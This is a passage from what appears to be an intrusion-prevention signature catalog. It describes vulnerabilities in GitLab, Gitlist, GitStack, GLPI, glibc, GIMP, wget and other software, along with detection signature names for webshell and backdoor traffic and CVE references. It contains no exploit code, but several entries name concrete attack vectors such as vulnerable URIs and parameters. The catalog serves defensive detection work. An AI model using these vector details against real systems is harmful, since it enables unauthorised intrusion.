Type:

Input Validation

Description:

A cross-site scripting vulnerability has been reported in the Community edition and Enterprise edition of GitLab. The vulnerability is due to insufficient input sanitization of design links included in markup code. A remote, authenticated attacker can exploit these vulnerabilities with crafted requests to the target server. Successful exploitation could result in arbitrary script execution in the target user's browser.

Situation:

HTTP_CS-Gitlab-Designreferencefilter-Stored-Cross-Site-Scripting
HTTP_CRL-Gitlab-Designreferencefilter-Stored-Cross-Site-Scripting

References:

CVE-2021-22238
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22238

Gitlab-File-Read-Remote-Code-Execution

About this vulnerability:

A vulnerability in GitLab.

Risk:

High

First detected in:

sgpkg-ips-1369-5242

Last changed:

sgpkg-ips-1369-5242

Platform:

Generic

Software:

GitLab

Type:

Input Validation

Description:

A vulnerability in GitLab Community Edition, versions 12.4.0 and above, fixed in 12.9.1, 12.8.8, and 12.7.8, which allows remote attackers to execute arbitrary code through a deserialization of a signed experimentation_subject_id cookie.

Situation:

HTTP_CS-Gitlab-File-Read-Remote-Code-Execution

References:

CVE-2020-10977
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10977

Gitlab-Gollum-Link-Regex-Denial-Of-Service

About this vulnerability:

A vulnerability in GitLab

Risk:

Moderate

First detected in:

sgpkg-ips-1772-5242

Last changed:

sgpkg-ips-1772-5242

Platform:

Generic

Software:

GitLab

Type:

Resource Starvation

Description:

A design weakness in a regular expression that processes gollum link search strings causes a denial of service vulnerability in Gitlab. A successful exploitation allows an attacker to cause a denial of service condition on the target system.

Situation:

HTTP_CRL-Gitlab-Gollum-Link-Regex-Denial-Of-Service

References:

CVE-2023-6502
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6502

Gitlab-Graphql-API-User-Enumeration

About this vulnerability:

A vulnerability in GitLab.

Risk:

High

First detected in:

sgpkg-ips-1446-5242

Last changed:

sgpkg-ips-1446-5242

Platform:

Generic

Software:

GitLab

Type:

Insecure Configuration

Description:

A vulnerability in GitLab, versions 13.0 - 14.8.2, 14.7.4, and 14.6.5, which allows remote attackers to query the GitLab GraphQL API without authentication to acquire the list of GitLab users.

Situation:

HTTP_CRL-Gitlab-Graphql-API-User-Enumeration

References:

CVE-2021-4191
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4191

Gitlab-Label-Description-Emoji-Uncontrolled-Resource-Consumption

About this vulnerability:

A vulnerability in GitLab

Risk:

Moderate

First detected in:

sgpkg-ips-1718-5242

Last changed:

sgpkg-ips-1718-5242

Platform:

Generic

Software:

GitLab

Type:

Resource Starvation

Description:

A resource exhaustion vulnerability has been reported in GitLab Community and Enterprise Edition. This vulnerability is due to improper user input validation when handling labels description. A remote attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in denial of service.

Situation:

HTTP_CRL-Gitlab-Label-Description-Emoji-Uncontrolled-Resource-Consumption

References:

CVE-2024-2818
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2818

Gitlab-Mermaid-Markdown-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE)

Risk:

Moderate

First detected in:

sgpkg-ips-1391-5242

Last changed:

sgpkg-ips-1391-5242

Platform:

Generic

Software:

GitLab

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported in the Community edition and Enterprise edition of GitLab. The vulnerability is due to improper input validation of Mermaid Markdown. A remote, authenticated attacker can exploit this vulnerability by sending specially-crafted markdown to the target system. Successful exploitation could result in the execution of script code in the security context of the browser of any user visiting the affected pages.

Situation:

HTTP_CRL-Gitlab-Mermaid-Markdown-Stored-Cross-Site-Scripting

References:

CVE-2021-22242
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22242

Gitlab-oauth-Page-Stored-XSS-CVE-2024-6530

About this vulnerability:

A vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE)

Risk:

Moderate

First detected in:

sgpkg-ips-1798-5242

Last changed:

sgpkg-ips-1798-5242

Platform:

Generic

Software:

GitLab

Type:

Input Validation

Description:

Improper validation of the application name parameter in certain requests causes a cross-site scripting vulnerability in GitLab. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Gitlab-oauth-Page-Stored-XSS-CVE-2024-6530

References:

CVE-2024-6530
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6530

Gitlab-Project-Import-Command-Injection

About this vulnerability:

A vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE)

Risk:

High

First detected in:

sgpkg-ips-1498-5242

Last changed:

sgpkg-ips-1498-5242

Platform:

Generic

Software:

GitLab

Type:

Input Validation

Description:

A command injection vulnerability has been reported in GitLab Community and Enterprise Editions. The vulnerability is due to errors in parsing imported project files on the server. A remote authenticated attacker could exploit this vulnerability by sending a crafted project file to the target server. Successful exploitation could lead to arbitrary command execution under the security context of the worker user on the vulnerable server.

Situation:

File-Text_Gitlab-Project-Import-Command-Injection

References:

CVE-2022-2185
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2185

Gitlab-Project-Settings-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE)

Risk:

Moderate

First detected in:

sgpkg-ips-1489-5242

Last changed:

sgpkg-ips-1489-5242

Platform:

Generic

Software:

GitLab

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability has been reported in the Community Edition and Enterprise Edition of GitLab. The vulnerability is due to improper input validation of the deploy key name. A remote, authenticated attacker can exploit this vulnerability by sending a crafted request to the target system. Successful exploitation could result in the execution of script code in the security context of a target user's browser.

Situation:

HTTP_CRL-Gitlab-Project-Settings-Stored-Cross-Site-Scripting

References:

CVE-2022-2230
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2230

Gitlab-Web-IDE-Cross-Site-Scripting-CVE-2024-4835

About this vulnerability:

An attempt to exploit a vulnerability in GitLab detected

Risk:

High

First detected in:

sgpkg-ips-1731-5242

Last changed:

sgpkg-ips-1731-5242

Platform:

Generic

Software:

GitLab

Type:

Input Validation

Description:

A cross-site scripting (XSS) condition exists within GitLab in versions 15.11 before 16.10.6, 16.11 before 16.11.3, and 17.0 before 17.0.1. By leveraging this condition, an attacker can craft a malicious page to exfiltrate sensitive user information.

Situation:

HTTP_CSU-Gitlab-Web-IDE-Cross-Site-Scripting-CVE-2024-4835

References:

CVE-2024-4835
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4835

Gitlab-Wiki-API-Attachments-Command-Injection

About this vulnerability:

A vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE)

Risk:

Moderate

First detected in:

sgpkg-ips-1122-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GitLab Wiki

Type:

Input Validation

Description:

There has been reported a remote code execution vulnerability in GitLab Wiki API. Exploiting this vulnerability can lead in arbitrary code execution.

Situation:

HTTP_CRL-Gitlab-Wiki-API-Attachments-Command-Injection

References:

CVE-2018-18649
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18649

Gitlist-Argument-Injection-Vulnerability-CVE-2018-1000533

About this vulnerability:

A vulnerability in GitList

Risk:

High

First detected in:

sgpkg-ips-1112-5242

Last changed:

sgpkg-ips-1866-5242

Platform:

Generic

Software:

Gitlist

Type:

Input Validation

Description:

A vulnerability in Gitlist, version 0.6.0, which allows remote attackers to execute arbitrary code due to the insufficient validation of the php function 'escapeshellarg'.

Situation:

HTTP_CRL-Gitlist-Argument-Injection-Vulnerability-CVE-2018-1000533

References:

CVE-2018-1000533
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000533

Gitlist-Unauthenticated-Remote-Command-Execution

About this vulnerability:

A Gitlist Unauthenticated Remote Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-698-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Gitlist

Type:

Input Validation

Description:

A vulnerability in Gitlist, versions before 0.5.0, which allows remote attackers to execute arbitrary commands with shell metacharacters in the URI of a request for /blame/master/, /master/, or /stats/master/.

Situation:

HTTP_CSU-Gitlist-Unauthenticated-Remote-Command-Execution

References:

CVE-2014-4511
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4511

GitStack-Remote-Code-Execution-Vulnerability

About this vulnerability:

A GitStack Remote Code Execution Vulnerability

Risk:

High

First detected in:

sgpkg-ips-1074-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

GitStack

Type:

Input Validation

Description:

A vulnerability in GitStack, version 2.3.10, which allows remote attackers to execute arbitrary code in the username and password fields via the rest/user/ URI.

Situation:

HTTP_CRL-GitStack-Remote-Code-Execution-Vulnerability

References:

CVE-2018-5955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5955

GitStack-Unauthenticated-Rest-API-Requests

About this vulnerability:

A GitStack Unauthenticated REST API Requests Vulnerability

Risk:

High

First detected in:

sgpkg-ips-1075-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GitStack

Type:

Input Validation

Description:

A vulnerability in GitStack, versions 2.3.10 and below, which allows remote attackers to list users and repositories, and add or delete users, via username and password fields to the /rest/user/ URI, due to the lack of user validation/authentication.

Situation:

HTTP_CRL-GitStack-Unauthenticated-Rest-API-Requests

References:

CVE-2018-5955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5955

GitStack-Unsanitized-Argument-Remote-Code-Execution

About this vulnerability:

A vulnerability in GitStack

Risk:

High

First detected in:

sgpkg-ips-1134-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GitStack

Type:

Input Validation

Description:

A vulnerability in GitStack, versions through 2.3.10, which allows remote attackers to add a user via the username and password fields in the rest/user/ URI, due to insufficient authentication checks.

Situation:

HTTP_CRL-GitStack-Unsanitized-Argument-Remote-Code-Execution

References:

CVE-2018-5955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5955

GiveWP-Unauthenticated-Donation-Process-Exploit

About this vulnerability:

An attempt to exploit a vulnerability in the GiveWP Donation Plugin detected

Risk:

High

First detected in:

sgpkg-ips-1771-5242

Last changed:

sgpkg-ips-1776-5242

Platform:

Windows; Linux; Unix

Software:

Wordpress GiveWP Plugin

Type:

Input Validation

Description:

A vulnerability in the GiveWP Donation Plugin and Fundraising Platform plugin for WordPress, versions 3.14.1 and before, which allows remote attackers to execute arbitrary code with a malicious request, due to insufficient validation of the give_title parameter.

Situation:

HTTP_CRL-GiveWP-Unauthenticated-Donation-Process-Exploit
HTTP_CRL-GiveWP-Unauthenticated-Donation-Process-Exploit-2

References:

CVE-2024-5932
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5932

GL.iNet-Unauthenticated-Remote-Command-Execution-Via-The-Logread-Module

About this vulnerability:

An attempt to exploit a vulnerability in a GL.iNet device detected.

Risk:

High

First detected in:

sgpkg-ips-1690-5242

Last changed:

sgpkg-ips-1728-5242

Platform:

Unix; Linux

Software:

GL.iNet

Type:

Input Validation

Description:

A vulnerability in multiple GL.iNet devices which allows remote attackers to inject and execute arbitrary shell commands via JSON parameters at the "gl_system_log" and "gl_crash_log" interface in the "logread" module.

Situation:

File-Text_GL.iNet-Unauthenticated-Remote-Command-Execution-Via-The-Logread-Module

References:

CVE-2023-50445
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50445

GlassFish-Authenticated-Code-Execution

About this vulnerability:

A vulnerability in Oracle GlassFish

Risk:

Moderate

First detected in:

sgpkg-ips-413-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle GlassFish Server

Type:

Malfunction

Description:

Default credentials used

Situation:

Generic_CS-Oracle-GlassFish-Server-Authenticated-Code-Execution
HTTP_CS-Oracle-GlassFish-Server-Authenticated-Code-Execution

References:

CVE-2011-0807
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0807

Glasstoken-WebShell

About this vulnerability:	Glasstoken webshell
Risk:	High
First detected in:	sgpkg-ips-1673-5242
Last changed:	sgpkg-ips-1673-5242
Platform:	Generic
Software:	<os>
Type:	Backdoor
Description:	Glasstoken webshell is associated with the known post-compromise activities after the exploitation of CVE-2023-46805 and CVE-2024-21887 in Ivanti Secure Connect VPN.
Situation:	File-Text_Glasstoken-WebShell

Gld-Greylisting-Server-Remote-System-Compromise

About this vulnerability:

Greylisting server remote compromise

Risk:

High

First detected in:

sgpkg-ips-28-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Gld

Type:

Malfunction

Description:

Gld, a greylisting server for Postfix, suffers from both a buffer overflow and a format strings vulnerability. The buffer overflows are caused by careless use of strcpy and sprintf in the code, and the format strings vulnerability comes from the illegal use of the syslog() function. Both vulnerabilities can be exploited by remote attackers to execute arbitrary code on the server running Gld.

Situation:

Generic_Gld-Greylisting-Server-Format-String-Remote-System-Compromise
Generic_Gld-Greylisting-Server-Buffer-Overflow-Remote-System-Compromise

References:

CVE-2005-1100
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1100

BID-13129
http://www.securityfocus.com/bid/13129

OSVDB-15493
http://www.osvdb.org/15493

Glibc-DNS-Resolver-Buffer-Overflow

About this vulnerability:

A vulnerability in glibc

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

glibc

Type:

Buffer Overflow

Description:

A vulnerability exists in the DNS stub resolver library in ISC BIND that also affects the resolver component of older versions of the glibc library.

Situation:

DNS-UDP_Glibc-DNS-Resolver-Buffer-Overflow

References:

CVE-2002-0029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0029

BID-6186
http://www.securityfocus.com/bid/6186

GlobalSCAPE-Secure-FTP-Server-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in GlobalSCAPE Secure FTP Server

Risk:

High

First detected in:

sgpkg-ips-645-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

GlobalSCAPE

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in GlobalSCAPE Secure FTP Server prior to 3.0.3 which allows a remote attacker to execute arbitrary code via a long FTP command. A valid user account, or ananymous access, is required.

Situation:

FTP_CS-GlobalSCAPE-Secure-FTP-Server-Buffer-Overflow

References:

CVE-2005-1415
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1415

BID-13454
http://www.securityfocus.com/bid/13454

OSVDB-16049
http://www.osvdb.org/16049

GLPI-Auth.php-SQL-Injection

About this vulnerability:

A vulnerability in GLPI-Project GLPI

Risk:

Moderate

First detected in:

sgpkg-ips-1486-5242

Last changed:

sgpkg-ips-1486-5242

Platform:

Generic

Software:

GLPI

Type:

Input Validation

Description:

Improper validation of the auth HTTP parameter in the login page of the GLIP application causes an SQL injection vulnerability, which can be exploited to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-GLPI-Auth.php-SQL-Injection

References:

CVE-2022-31061
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31061

GLPI-Computervirtualmachine-SQL-Injection

About this vulnerability:

A vulnerability in GLPI-Project GLPI

Risk:

Moderate

First detected in:

sgpkg-ips-1617-5242

Last changed:

sgpkg-ips-1617-5242

Platform:

Generic

Software:

GLPI

Type:

Input Validation

Description:

Improper sanitization of the UUID of a virtual machines causes an SQL injection vulnerability in GLPI. A successful exploit allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-GLPI-Computervirtualmachine-SQL-Injection
File-Text_GLPI-Computervirtualmachine-SQL-Injection
File-TextId_GLPI-Computervirtualmachine-SQL-Injection

References:

CVE-2023-36808
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36808

GLPI-Htmlawedtest-Code-Injection

About this vulnerability:

A vulnerability in GLPI

Risk:

Moderate

First detected in:

sgpkg-ips-1513-5242

Last changed:

sgpkg-ips-1513-5242

Platform:

Generic

Software:

GLPI

Type:

Input Validation

Description:

Improper validation of user configuration data sent to the htmLawedTest.php endpoint causes a code injection vulnerability in GLPI. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Project-GLPI-Htmlawedtest-Code-Injection

References:

CVE-2022-35914
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35914

GLPI-install.php-Remote-Command-Execution

About this vulnerability:

GLPI install.php Remote Command Execution attack

Risk:

Moderate

First detected in:

sgpkg-ips-569-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GLPI

Type:

PHP Injection

Description:

There is an arbitrary code execution vulnerability in GLPI Information Resource-Management software.

Situation:

HTTP_CRL-GLPI-install.php-Remote-Command-Execution

References:

CVE-2013-5696
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5696

GLPI-Inventory-Agent-SQL-Injection

About this vulnerability:

A vulnerability in GLPI-Project GLPI

Risk:

Moderate

First detected in:

sgpkg-ips-1616-5242

Last changed:

sgpkg-ips-1616-5242

Platform:

Generic

Software:

GLPI

Type:

Input Validation

Description:

Improper validation of user data from inventory agent requests causes an SQL injection vulnerability in GLPI. A successful exploit allows an attacker to execute arbitrary SQL on the target system.

Situation:

File-Text_GLPI-Inventory-Agent-SQL-Injection
File-TextId_GLPI-Inventory-Agent-SQL-Injection

References:

CVE-2023-35924
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-35924

GLPI-Inventory-Agent-SQL-Injection-CVE-2023-46727

About this vulnerability:

A SQL injection vulnerability in GLPI

Risk:

High

First detected in:

sgpkg-ips-1674-5242

Last changed:

sgpkg-ips-1674-5242

Platform:

Generic

Software:

GLPI

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in GLPI. The vulnerability is due to improper validation of user data from inventory agent requests used in SQL queries. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in an attacker executing arbitrary SQL queries against the target server's database.

Situation:

File-Text_GLPI-Inventory-Agent-SQL-Injection-CVE-2023-46727
File-TextId_GLPI-Inventory-Agent-SQL-Injection-CVE-2023-46727

References:

CVE-2023-46727
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46727

GLPI-Rest-API-User_Token-SQL-Injection

About this vulnerability:

A vulnerability in GLPI-Project GLPI

Risk:

Moderate

First detected in:

sgpkg-ips-1528-5242

Last changed:

sgpkg-ips-1528-5242

Platform:

Generic

Software:

GLPI

Type:

Input Validation

Description:

Improper validation of the user token when authenticating with the REST API causes an SQL injection vulnerability in GLPI. A successful exploit allows an attacker to execute arbitrary SQL on the target database.

Situation:

HTTP_CS-GLPI-Rest-API-User_Token-SQL-Injection

References:

CVE-2022-39323
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39323

Glutton-Backdoor-Activity

About this vulnerability:	Glutton backdoor activity detected
Risk:	High
First detected in:	sgpkg-ips-1814-5242
Last changed:	sgpkg-ips-1814-5242
Platform:	Linux
Software:	Glutton malware
Type:	Backdoor
Description:	The Chinese Winnti hacking group is using a new PHP backdoor, named 'Glutton', in attacks on organizations in China and the U.S.. The backdoor is also used in attacks on other cybercriminals. Chinese security firm QAX's XLab discovered the malware in April 2024. However, the evidence of its deployment dates back to December 2023.
Situation:	Generic_UDP-Glutton-Backdoor-C2-Traffic HTTP_CSU-Glutton-Backdoor-HTTP-Traffic Generic_CS-Glutton-Backdoor-C2-Traffic

Gmail-Web-Interface-Usage

About this vulnerability:	Gmail web interface usage
Risk:	Moderate
First detected in:	sgpkg-ips-233-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic browser
Type:	Browser
Description:	Usage of the Gmail web service was detected.
Situation:	HTTP_CRL-Gmail-Web-Interface-Usage

Gnome-Project-Libxslt-Library-Rc4-Key-String-Buffer-Overflow

About this vulnerability:

A vulnerability in Libxslt Libxslt

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

libxslt

Type:

Buffer Overflow

Description:

There exists a heap based buffer overflow vulnerability in RC4 libxslt library extension.

Situation:

HTTP_SS-Gnome-Project-Libxslt-Library-Rc4-Key-String-Buffer-Overflow
File-Text_Gnome-Project-Libxslt-Library-Rc4-Key-String-Buffer-Overflow

References:

CVE-2008-2935
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2935

BID-30467
http://www.securityfocus.com/bid/30467

Gnu-C-Library-Getaddrinfo-Buffer-Overflow

About this vulnerability:

A vulnerability in GNU glibc

Risk:

Moderate

First detected in:

sgpkg-ips-1053-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

<os>

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in the getaddrinfo() function of the GNU C Library. A remote, unauthenticated attacker can use this to execute remote code or acchieve denial of service conditions.

Situation:

DNS-TCP_Gnu-C-Library-Getaddrinfo-Buffer-Overflow
Datalength-UDP_Gnu-C-Library-Getaddrinfo-Buffer-Overflow

References:

CVE-2015-7547
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547

Gnu-C-Library-Gethostbyname-Buffer-Overflow

About this vulnerability:

A vulnerability in GNU C Library

Risk:

High

First detected in:

sgpkg-ips-627-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

glibc; Exim

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in GNU C Library (glibc) __nss_hostname_digits_dots() function which is accessible from gethostbyname*() functions. The function can overflow sizeof(*char) bytes, 4 or 8 for 32-bit or 64-bit architectures, respectively. A remote attacker can exploit this vulnerability by providing crafted input to an application that uses a gethostbyname function with user controlled input; the exact mechanism will depend on the application using the vulnerable function. Successful exploitation could result in code execution in the context of the affected application. This vulnerability is commonly referred to as 'GHOST'.

Situation:

SMTP_Gnu-C-Library-Gethostbyname-Buffer-Overflow
SMTP_Helo-Overflow

References:

CVE-2015-0235
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0235

BID-72325
http://www.securityfocus.com/bid/72325

OSVDB-117579
http://www.osvdb.org/117579

Gnu-C-Library-Glibc-Getanswer_r-Buffer-Overflow

About this vulnerability:

A vulnerability in GNU glibc

Risk:

High

First detected in:

sgpkg-ips-644-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

glibc

Type:

Buffer Overflow

Description:

A code execution vulnerability exists in GNU C Library. The vulnerability is due to an error within the getanswer_r() function when handling DNS response resulting in a buffer overflow. A remote attacker can exploit this vulnerability by providing a specially-crafted DNS response to an application using the getanswer_r() functionality.

Situation:

DNS-UDP_Gnu-C-Library-Glibc-Getanswer_r-Buffer-Overflow

References:

CVE-2015-1781
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1781

BID-74255
http://www.securityfocus.com/bid/74255

Gnu-GIMP-DDS-Image-Parsing-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in The GIMP Team GIMP

Risk:

Moderate

First detected in:

sgpkg-ips-1697-5242

Last changed:

sgpkg-ips-1697-5242

Platform:

Generic

Software:

GIMP

Type:

Buffer Overflow

Description:

Improper handling of DDS files causes a buffer overflow vulnerability in GIMP. A successful exploitation can allow an attacker to execute arbitrary code on the target system.

Situation:

File-Binary_Gnu-GIMP-DDS-Image-Parsing-Heap-Buffer-Overflow

References:

CVE-2023-44441
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44441

Gnu-GIMP-Psd-Image-Channel-Data-Parsing-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in GIMP

Risk:

High

First detected in:

sgpkg-ips-1717-5242

Last changed:

sgpkg-ips-1717-5242

Platform:

Generic

Software:

GIMP

Type:

Buffer Overflow

Description:

A code execution vulnerability has been reported in GNU Image Manipulation Program (GIMP). Remote attackers can exploit this vulnerability by enticing the target user to open a malicious PSD file. Successful exploitation could result in arbitrary code execution under the context of the user.

Situation:

File-Binary_Gnu-GIMP-Psd-Image-Channel-Data-Parsing-Heap-Buffer-Overflow

References:

CVE-2023-44442
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44442

Gnu-GIMP-Psp-Image-Channel-Block-Parsing-Off-By-One-Buffer-Overflow

About this vulnerability:

A vulnerability in GIMP

Risk:

High

First detected in:

sgpkg-ips-1710-5242

Last changed:

sgpkg-ips-1710-5242

Platform:

Generic

Software:

GIMP

Type:

Buffer Overflow

Description:

A code execution vulnerability has been reported in GNU Image Manipulation Program (GIMP). The vulnerability is due to handle PSP files. Remote attackers can exploit this vulnerability by enticing the target user to open a malicious image. Successful exploitation could result in arbitrary code execution under the context of the user.

Situation:

File-Binary_Gnu-GIMP-Psp-Image-Channel-Block-Parsing-Off-By-One-Buffer-Overflow

References:

CVE-2023-44444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44444

Gnu-Gzip-Lzh-Decompression-Make_Table-Stack-Modification

About this vulnerability:

A vulnerability in Free Software Foundation gzip

Risk:

Moderate

First detected in:

sgpkg-ips-973-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

gzip

Type:

Malfunction

Description:

There exists a vulnerability in the GNU gzip application. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Binary_Gnu-Gzip-Lzh-Decompression-Make_Table-Stack-Modification

References:

CVE-2006-4335
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4335

BID-20101
http://www.securityfocus.com/bid/20101

Gnu-Libextractor-Zip-File-Comment-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in GNU Libextractor

Risk:

Moderate

First detected in:

sgpkg-ips-1105-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GNU Libextractor

Type:

Malfunction

Description:

Improper handling of long File Comment fields within ZIP files causes an out of bounds read vulnerability in the Gnu Libextractor library. A successful exploit may cause a denial of service condition or a data leak.

Situation:

File-Binary_Gnu-Libextractor-Zip-File-Comment-Out-Of-Bounds-Read
File-Zip_Gnu-Libextractor-Zip-File-Comment-Out-Of-Bounds-Read

References:

CVE-2018-16430
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16430

Gnu-Radius-SQL-Accounting-Format-String-Vulnerability

About this vulnerability:

A vulnerability in Free Software Foundation GNU Radius

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GNU Radius

Type:

Format String

Description:

There is a format string vulnerability in the GNU Radius suite. The flaw may be exploited by sending a malicious request message to the Radius daemon. Successful exploitation may allow an attacker to inject and execute arbitrary code on the target host within the privileges of the Radius process. If the attack is not successful in code injection and execution, the target Radius server child process will terminate upon exploitation. The main Radius server process is not affected. If an attack results in successful code injection and its subsequent execution, the behaviour of the target host will depend on the intention of the attacker. Note that any code execution will occur within the security context of the affected service, normally root.

Situation:

Generic_Gnu-Radius-SQL-Accounting-Format-String-Vulnerability

References:

CVE-2006-4181
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4181

BID-21303
http://www.securityfocus.com/bid/21303

Gnu-Tar-From_Header-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in GNU Tar.

Risk:

High

First detected in:

sgpkg-ips-1566-5242

Last changed:

sgpkg-ips-1566-5242

Platform:

Linux

Software:

GNU Tar

Type:

Malfunction

Description:

A vulnerability in GNU Tar, versions 1.34 and prior, which allows remote attackers to cause a denial of service condition or diclose information by enticing a victim to extract a crafted file, due to a missing bounds check when reading a base-256 value in the from_header function.

Situation:

File-Binary_Gnu-Tar-From_Header-Out-Of-Bounds-Read

References:

CVE-2022-48303
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303

Gnu-Wget-Cookie-Injection-Policy-Bypass

About this vulnerability:

A vulnerability in GNU wget

Risk:

Moderate

First detected in:

sgpkg-ips-1068-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Wget

Type:

Input Validation

Description:

Improper handling of cookies within HTTP responses, causes a vulnerability in Gnu Wget, allowing arbitrary cookies to be set for arbitrary domains, which can lead to a policy bypass.

Situation:

HTTP_SHS-Gnu-Wget-Cookie-Injection-Policy-Bypass

References:

CVE-2018-0494
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0494

Gnu-Wget-FTP-Remote-File-Creation

About this vulnerability:

A vulnerability in GNU wget prior to 1.16 wget

Risk:

Moderate

First detected in:

sgpkg-ips-615-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Wget

Type:

Input Validation

Description:

An input validation error exists in wget. The vulnerability can occur when wget retrieves files or directories over FTP that are or that contain symlinks. By default wget creates symlinks locally instead of following symlinks on the destination and creating duplicate files locally. A remote attacker can exploit this vulnerability by creating a crafted FTP directory listing on a server and enticing a user to open the FTP location with a vulnerable wget. Upon successful exploitation, arbitrary files, directories or symlinks with attacker-desired permissions are created on the target system.

Situation:

FTP_DI-Gnu-Wget-FTP-Remote-File-Creation

References:

CVE-2014-4877
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4877

OSVDB-113736
http://www.osvdb.org/113736

Gnu-Wget-Skip_Short_Body-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in GNU Wget

Risk:

High

First detected in:

sgpkg-ips-1146-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Wget

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in GNU Wget, verions prior to 1.19.2, which allows remote attackers to execute arbitrary code by enticing a user to make an HTTP request with the affected application, due to the improper handling of HTTP responses with chunked transfer-encoding within the skip_short_body() function.

Situation:

